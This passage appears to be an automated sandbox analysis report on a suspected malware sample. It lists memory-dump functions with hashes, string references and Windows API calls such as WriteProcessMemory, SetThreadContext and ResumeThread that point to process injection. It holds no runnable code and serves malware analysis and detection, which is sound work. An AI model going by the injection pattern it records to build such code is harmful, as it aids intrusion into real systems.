Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 07EE6117
(bq, xrefs: 07EE6079
(bq, xrefs: 07EE60A5

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: (bq$(bq$(bq
API String ID: 0-2716923250
Opcode ID: 8dda41506193161b8d895d06dfe6258f7c5342e5c8ce87ca09105d347614510d
Instruction ID: 673539f8c876628f4ef1e7573c4df588c3c572756ec717ae83fe4ff0f6d2dedd
Opcode Fuzzy Hash: 8dda41506193161b8d895d06dfe6258f7c5342e5c8ce87ca09105d347614510d
Instruction Fuzzy Hash: 7AA19FB0E01319DFCB14DFA9C84469EBBF6FF89314F148969D409AB390DB719885CB91

Function 07EE64E0 Relevance: 2.9, Strings: 2, Instructions: 379COMMON

Download Yara Rule

Strings

Hbq, xrefs: 07EE6598
Hbq, xrefs: 07EE6621

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: a8c1e8a60809f3bf2d6621983a95aaef0f592528fb09945ec962673ba366afc8
Instruction ID: d3e3cf8819a3c45c618705f68f107527f21a61bccff769d8710194babcbd010d
Opcode Fuzzy Hash: a8c1e8a60809f3bf2d6621983a95aaef0f592528fb09945ec962673ba366afc8
Instruction Fuzzy Hash: 2DC1C471B15215CBC704BFBAD89A23EBBF6EF88600F514969E449D7390DE389C058792

Function 07EE5AE8 Relevance: 2.8, Strings: 2, Instructions: 269COMMON

Download Yara Rule

Strings

nKvq, xrefs: 07EE5CE0
nKvq, xrefs: 07EE5CC1

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: nKvq$nKvq
API String ID: 0-2223595353
Opcode ID: 8c49c89e1ec5caff4e02ea48a6e9696368a30fde96cf9570c81afdc331b144b1
Instruction ID: deb3c5bb9eb199e0742d7783f246b1832a44f5d0a7fa613b5da7305195ab404d
Opcode Fuzzy Hash: 8c49c89e1ec5caff4e02ea48a6e9696368a30fde96cf9570c81afdc331b144b1
Instruction Fuzzy Hash: ADC16C74E006068FCB14DF68C8809AEFBB6FF88324F158655D955AB365DB30EC92CB90

Function 07EE5AD8 Relevance: 2.7, Strings: 2, Instructions: 248COMMON

Download Yara Rule

Strings

nKvq, xrefs: 07EE5CE0
nKvq, xrefs: 07EE5CC1

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: nKvq$nKvq
API String ID: 0-2223595353
Opcode ID: 7e0f92c3a94e14d7e293e86783c4c4b3fc2fbe65f7a35d17c43f6bace2e1c815
Instruction ID: efaf94cb6104ab191fbb9e5dec3f662ee5343a11e0b9d563ceb8ebfa88fb60d8
Opcode Fuzzy Hash: 7e0f92c3a94e14d7e293e86783c4c4b3fc2fbe65f7a35d17c43f6bace2e1c815
Instruction Fuzzy Hash: 35B12A75E006068FCB14DF58C8809AEF7B6BF88310F158655E955AB369DB30FC96CB90

Function 07EE2ABC Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

Hbq, xrefs: 07EE2C89
@, xrefs: 07EE2AD4

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: @$Hbq
API String ID: 0-3332154116
Opcode ID: 3899ddba1b34959f726db4d865b3f4a60c7442048cc32ea24030fa6de6fcfe8b
Instruction ID: fc3d227fdef46f75b7c7464a1318061235fb9faf94067cb5713032b5c3382e7f
Opcode Fuzzy Hash: 3899ddba1b34959f726db4d865b3f4a60c7442048cc32ea24030fa6de6fcfe8b
Instruction Fuzzy Hash: 95515671B05A418FD7109F38C85076A7BEEBF8A310F1545B9D585CF3E6DA348C468791

Function 07EE7690 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07EE7697
TJcq, xrefs: 07EE76AC

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: f0fe8bfb8bb93e768c142a048a3552bfb8f51433aeb9094709c27fbb456daf7d
Instruction ID: 9f8c99b0d66a3932321a1a3fec9e886d700c96eb8b816f7243f9bfa3d24528e1
Opcode Fuzzy Hash: f0fe8bfb8bb93e768c142a048a3552bfb8f51433aeb9094709c27fbb456daf7d
Instruction Fuzzy Hash: D4F0F6357100115FCA08AB7DE558A3E76EBAFC9A2031400AAE50ACB3A0CE64DC07479A

Function 07F5DACD Relevance: 1.6, APIs: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07F5DBB3

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9db33181e3861f295975a694c666dca04ca0cddc52b59701de873671f7a18f8c
Instruction ID: 6e066e066c948db7121048df1a060c4343e53bf64ad58341ee71c3182e0ef343
Opcode Fuzzy Hash: 9db33181e3861f295975a694c666dca04ca0cddc52b59701de873671f7a18f8c
Instruction Fuzzy Hash: 6431BDB7A453899FCB01DF59E8A0ADBFBF0AB48221F04C01BE558A3251D63647468FE1

Function 064EEF77 Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 064EF010

Memory Dump Source

Source File: 00000000.00000002.2207492676.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_0Z2lZiPk5K.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 438df66a1177a0d5eb3ea333b84f9211c2ef010d18acb82dd894bb1a4e355b44
Instruction ID: 9be8b5e16bc7ffafc3e88e121745ee08467711099c943c3438d23b44b6ff2884
Opcode Fuzzy Hash: 438df66a1177a0d5eb3ea333b84f9211c2ef010d18acb82dd894bb1a4e355b44
Instruction Fuzzy Hash: BB31B5B1C093959FDB12CF65C80479EBFB0EF0A310F05819BD454EB292C3385944CBA6

Function 07EE1B88 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

LR^q, xrefs: 07EE1DEB

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 6485316540bbb1fcabbf41d5f95ef1184b477301559caebda004c9bc3109d3f6
Instruction ID: b0c12ee32995922be0ff5d3f47f4de8b14d004aab43d9b68a1ed591717dffeb9
Opcode Fuzzy Hash: 6485316540bbb1fcabbf41d5f95ef1184b477301559caebda004c9bc3109d3f6
Instruction Fuzzy Hash: E5B1C571B106158BC704FFBAD49926DBBF6BB8C604F404869E44DE7390DE389D49C762

Function 064EFD10 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 064EFDA8

Memory Dump Source

Source File: 00000000.00000002.2207492676.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_0Z2lZiPk5K.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 09516cdf23e4b3997e17c89e3c7b629bf5af5acea5ae37872a67c25f33632912
Instruction ID: be1486584aca1389543454c31d6075c5b42e2c6ee4df146bddfa003ae7bc2901
Opcode Fuzzy Hash: 09516cdf23e4b3997e17c89e3c7b629bf5af5acea5ae37872a67c25f33632912
Instruction Fuzzy Hash: 232135B59002499FCB50CFA9C884BEEBFF1FF88314F10842EE959A7251C7789955CBA4

Function 064EFD18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 064EFDA8

Memory Dump Source

Source File: 00000000.00000002.2207492676.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_0Z2lZiPk5K.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f68302d85b47fc8dbbeb168a0f8faa8d9a3237965e9b18323f4e31041fe2965
Instruction ID: de83790cc6ef8730fcb46c775f1b980545e99c89a39dcecb566860414c56173c
Opcode Fuzzy Hash: 2f68302d85b47fc8dbbeb168a0f8faa8d9a3237965e9b18323f4e31041fe2965
Instruction Fuzzy Hash: 212155B59003099FCB50CFA9C885BDEBBF5FF88310F10842AE959A7250C778A944CBA4

Function 0853F9A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0853FA26

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9803a57c497af69380eb1c374c6f0440bce0b220a175fb75e54b12c64499065f
Instruction ID: a557bb6c6eda3f1e13e84febf40383fbe3d59a6c654c0d0646bd5d9b7343d594
Opcode Fuzzy Hash: 9803a57c497af69380eb1c374c6f0440bce0b220a175fb75e54b12c64499065f
Instruction Fuzzy Hash: D12109B1D002198FDB10DFAAC4457EEBBF4AB48314F14842AD559A7241CB789545CFA5

Function 07F5FED8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07F5FF56

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 17f2daa6a053b7014bd59ab1c4ffcd303fe1448cff6dda7457c5520a1bdb0cf6
Instruction ID: e5df7267f25f6acc3dc0bd8db6bb322a0b3f6fc389793bdace251f1ca6af4d55
Opcode Fuzzy Hash: 17f2daa6a053b7014bd59ab1c4ffcd303fe1448cff6dda7457c5520a1bdb0cf6
Instruction Fuzzy Hash: 0C2129B1D003098FDB10DFAAC485BEEBBF4EF49324F148429D559A7241CB78A945CFA5

Function 07F5FC38 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07F5FCAF

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f3e88d8d746b5cfffe976de7075c07295a1165a4868e119df56ae64792319022
Instruction ID: cacd66d1b4813cdb208165c5d152be0d56331eef37fb6c06a165adb678316e75
Opcode Fuzzy Hash: f3e88d8d746b5cfffe976de7075c07295a1165a4868e119df56ae64792319022
Instruction Fuzzy Hash: 7C2149B1C002099FCB10DFAAC444BEEFBF5EF48320F148429D959A7250CB389545CFA1

Function 085367C8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08536843

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fe9687eb66c31b0009191427141add811cac28b6daac582cfa2e5fab9f2d671b
Instruction ID: 25ad40be57c39bcf461366fd2f0e069ed7e56446c566c99f28c34d5fca3b9c5f
Opcode Fuzzy Hash: fe9687eb66c31b0009191427141add811cac28b6daac582cfa2e5fab9f2d671b
Instruction Fuzzy Hash: 572106B59002499FCB10DF9AC845BDEFFF4FB48320F108029E558A7251D779A545CFA5

Function 064E5E38 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 064EF010

Memory Dump Source

Source File: 00000000.00000002.2207492676.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_0Z2lZiPk5K.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6a8c96cc2d657b3e86143b2716ca244f9cef862f22a6624a5e12bcf8c1734493
Instruction ID: d93cad95c8d844e75edc196272b7fd5d0ad7cf1e96b81f76e831859ac716b2de
Opcode Fuzzy Hash: 6a8c96cc2d657b3e86143b2716ca244f9cef862f22a6624a5e12bcf8c1734493
Instruction Fuzzy Hash: C82124B1C006699FCB24CF9AD444BAEFBF4EB48320F10812AD858A7345D778A944CFE5

Function 085367D0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08536843

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 65ec467b0eb68bbc34928aab419f9bbf865c364b3c55a169cb24e1b825e94b8c
Instruction ID: 1ac03d39351e4f23188d210e4d2405016a51ef947972e515330d8925f81750d4
Opcode Fuzzy Hash: 65ec467b0eb68bbc34928aab419f9bbf865c364b3c55a169cb24e1b825e94b8c
Instruction Fuzzy Hash: 4F21E4B5900259DFCB10DF9AC484BDEFBF4FB48320F108429E958A7251D778A545CFA5

Function 07F5DB40 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07F5DBB3

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cb3f2a4640afc6008f4f8b17afbbba77499914faf1c041121e8fecede18e2b45
Instruction ID: f7283a7517bea2fba88fa6b68cf27201b83815ffb44904aac869c7f9a18dc860
Opcode Fuzzy Hash: cb3f2a4640afc6008f4f8b17afbbba77499914faf1c041121e8fecede18e2b45
Instruction Fuzzy Hash: 8D2114B5900249DFCB10CF9AC884BDEFBF4FB48320F108429E958A7251D778A644CFA5

Function 02BFE1A0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 02BFEDC0

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: d89edd613c4b41e649e587a939c8d277a7a96b569d7ea9d0af7c8767514c5949
Instruction ID: f647e713842287238e0953460deb5778b9e39228bcffc7ba49be95796e42e8c2
Opcode Fuzzy Hash: d89edd613c4b41e649e587a939c8d277a7a96b569d7ea9d0af7c8767514c5949
Instruction Fuzzy Hash: 771142B6D006199BCB10CF9AC444BAEFBF4FB48320F10816AD918B7610C774A944CFA5

Function 02BFED49 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 02BFEDC0

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 542fa0f146413be63e647a10a4cc419001be56dacf9a3c55ca85573ea8698783
Instruction ID: 1ac0a8c248a2d4b32dc1f7a633588f5e4847a299c1c5616cd3464f253a593d3b
Opcode Fuzzy Hash: 542fa0f146413be63e647a10a4cc419001be56dacf9a3c55ca85573ea8698783
Instruction Fuzzy Hash: D41153B6C006199BCB14CF9AC844B9EFBF4FB48320F10816AD918A3750C774A644CFA5

Function 04D601C9 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04D60232

Memory Dump Source

Source File: 00000000.00000002.2190359854.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_0Z2lZiPk5K.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7f77aa8616724d37e52f560e30157c5bc1ba90961aff53f508430dd79c63fdde
Instruction ID: 2e48aef6d31a755e994d3db632b26d31870719287ff8f1e000f3b99f123fd099
Opcode Fuzzy Hash: 7f77aa8616724d37e52f560e30157c5bc1ba90961aff53f508430dd79c63fdde
Instruction Fuzzy Hash: 541146B19002488BCB24DFAAC445BDEFBF4EB88324F208419D459A7240CA75A545CFA5

Function 04D601D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04D60232

Memory Dump Source

Source File: 00000000.00000002.2190359854.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_0Z2lZiPk5K.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3a2af70e516382daa4e7e06923014e3012ec06ad822490efa55df24deb8d7afa
Instruction ID: 39a418e3d3f0c41f3e056e5d9634163673b4fba1f7d4e9121a91b877a2c0b385
Opcode Fuzzy Hash: 3a2af70e516382daa4e7e06923014e3012ec06ad822490efa55df24deb8d7afa
Instruction Fuzzy Hash: E31166B19002488FCB20DFAAC445BDFFBF4EF88324F208429C459A7240CB75A944CFA5

Function 04D60758 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04D607BD

Memory Dump Source

Source File: 00000000.00000002.2190359854.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_0Z2lZiPk5K.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d2efd9b50c12eb852e774ca8b5b1da15969aecca2737e5b29696a608426c229f
Instruction ID: b36f6207daceb524db0aac30d53372845940fafce1915d3e613c0f0b20ed1b66
Opcode Fuzzy Hash: d2efd9b50c12eb852e774ca8b5b1da15969aecca2737e5b29696a608426c229f
Instruction Fuzzy Hash: 7711E0B58003499FDB10DF99C485BDEBBF8EB48320F10845AE559A7751C375A984CFA1

Function 04D60760 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04D607BD

Memory Dump Source

Source File: 00000000.00000002.2190359854.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_0Z2lZiPk5K.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 07497abc3fd187c17ce70c510e3daf8391d99caccc7a0f79f3f76051dbf752fd
Instruction ID: c25b875dea325c14541b30f353b631511d1347d7f334cd388edbd5527dc6d87f
Opcode Fuzzy Hash: 07497abc3fd187c17ce70c510e3daf8391d99caccc7a0f79f3f76051dbf752fd
Instruction Fuzzy Hash: E81103B58003489FDB10DF9AC485BDEBBF8EB48320F108419D558A7700C375A944CFA1

Function 07EE1B79 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

LR^q, xrefs: 07EE1DEB

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 2d9f05fe413f4b0da4c2d83bf9ed56839403667305ecf06341a05832124dcffb
Instruction ID: f59ccacb4aa0f7b93e68a55fa860234eb70bd2b6e75b5cec7565d105f4afa069
Opcode Fuzzy Hash: 2d9f05fe413f4b0da4c2d83bf9ed56839403667305ecf06341a05832124dcffb
Instruction Fuzzy Hash: 7691D471B106198BC704FFBAD48926DBBF6BB8C604F504869E049E7390DE389D49CB62

Function 07EE3C3F Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

W, xrefs: 07EE3C4D

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 1b856bf957ac0d92b3ccf0030491b7f6d2198c7136f303a148b2cd8f5ceb46e1
Instruction ID: 4b6dcd15a5fb616727c027b3babbda10ada45cc3a80716c0a4d72db5987e29af
Opcode Fuzzy Hash: 1b856bf957ac0d92b3ccf0030491b7f6d2198c7136f303a148b2cd8f5ceb46e1
Instruction Fuzzy Hash: D7612871A00609DFCB14DFA9C494A9DBBF6FF88314F118569E809AB360DB70AD85CB80

Function 07EE33A8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07EE3413

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3691ca76157362e9566058651f8cbfb2006069dfcf080a73437530fbc4a07ad3
Instruction ID: 1f194a8c142a39750560abcc25dd542850c8fb6cca4353a3e09820a0759e154b
Opcode Fuzzy Hash: 3691ca76157362e9566058651f8cbfb2006069dfcf080a73437530fbc4a07ad3
Instruction Fuzzy Hash: 8E115E71F0020A8BCB45EBB999006EEB7FAAFC4314B50057AC519E7244EF358E05CB91

Function 07EE57D8 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

(bq, xrefs: 07EE5800

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 0452c8886b30916c7a26be04da468905c723d159cd7ac548dcd202429c5da3e6
Instruction ID: 7d88a0d3e5803681181b7cda5af453fbbbbcf38fbeaebff98af269a7d17b7e5b
Opcode Fuzzy Hash: 0452c8886b30916c7a26be04da468905c723d159cd7ac548dcd202429c5da3e6
Instruction Fuzzy Hash: 40F0E9727091945FD75D6669582072F3B9BDBC6621F1840AFD505CB3C1CE249C0287A6

Function 07EE0006 Relevance: .6, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf076d4392e4dbdf0c1eff58dc28cef6e3b604edb4905ce25e0ad00a526e649
Instruction ID: ef38a2109f5ebb3f7b0dac7eb609c245a6c660cfce92c77d687c97ff6db29029
Opcode Fuzzy Hash: 3cf076d4392e4dbdf0c1eff58dc28cef6e3b604edb4905ce25e0ad00a526e649
Instruction Fuzzy Hash: DC22B170A11615CFCB04BFB9D98926DBBB1FF88700F5048A9E089E7360DE789D59CB52

Function 07EE101A Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7862e08e12788111994ec0574335d2dc1e022938617b74d02a5e6ec320d7de
Instruction ID: 2816ea43b6351b4b00f616cbdfa2f82f1f6fc99f3c117bb9e07a7baee8d1dd92
Opcode Fuzzy Hash: 6d7862e08e12788111994ec0574335d2dc1e022938617b74d02a5e6ec320d7de
Instruction Fuzzy Hash: 62F1D470F152198BDB04FFB9D89526DBBB2EB88604F414869E489EB390DE389C45CB52

Function 07EEF7C0 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea5034bcbdc72885b08235e34bbb37d69cfbea7e45aaf4b83a653b921b0ba39
Instruction ID: af415ff080c828a87366f0e3c0c29abdfa426dd34c2455852d9a538958919d16
Opcode Fuzzy Hash: dea5034bcbdc72885b08235e34bbb37d69cfbea7e45aaf4b83a653b921b0ba39
Instruction Fuzzy Hash: 3DE1B471B10215CBC744FFBAE89962EBBF2BF88604F414868E449D7394DE389D46C792

Function 07EE1070 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5c7a838c483af74b3506d489d76428dba65758257e2456224f4666e967d440
Instruction ID: d2e638492bc206e5a839e1b5b7ed40c0724cff16f2f4115dc1b1d74d13acda68
Opcode Fuzzy Hash: 6b5c7a838c483af74b3506d489d76428dba65758257e2456224f4666e967d440
Instruction Fuzzy Hash: 94E1B270F112198BDB04FFBAD49526EBBF2FB88704F514869E449AB390DE389C45CB52

Function 07EEF7B0 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febb19184e77ecedb7e4183f602d9c8fa3b992048c1d8e500bc16d4eff1b8801
Instruction ID: c33c5b62347f593059a1fd77aac4766d3f6bbb6e048ea9fa8a4b3ae190dc29b2
